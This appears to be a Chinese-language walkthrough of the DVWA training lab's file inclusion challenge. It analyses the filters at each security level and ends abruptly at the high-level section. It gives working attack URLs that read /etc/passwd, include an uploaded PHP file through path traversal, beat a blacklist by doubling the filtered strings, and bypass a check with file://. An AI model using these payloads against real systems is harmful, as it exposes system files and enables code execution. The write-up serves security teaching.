代码分析
后端代码分析无任何限制
漏洞利用
本地包含
点击漏洞点构造攻击http://192.168.4.32/dvwa/vulnerabilities/fi/?page=/etc/passwd
得到系统类型,暴露绝对路径
创建file_inclusion_low.txt文件:/*<?php phpinfo(); ?>*/
包含路径一般有绝对路径和相对路径均可
#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt
#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=../../../../../../../../../phpStudy/WWW/DVWA/file_inclusion_low.txt
远程包含
可通过远程搭建http/https服务进行文件包含
代码分析
Medium后端
过滤了”http:// ”、”https://”、 ” ../”、”..\”字符,检查存在及替换为空
漏洞利用
这种黑名单式限制一般很容易绕过,双写即可
本地包含测试
绝对路径,直接写就行,不影响
#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt
相对路径,双写绕过
#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=..././..././..././....//..././phpStudy/WWW/DVWA/file_inclusion_low.txt
代码分析
High级别的代码使用了fnmatch函数检查$page,开头为file,服务器才会去包含相应的文件。
漏洞测试
可使用文件协议file绕过,file读取文件需知道绝对路径,可用绝对路径方式测试
绝对路径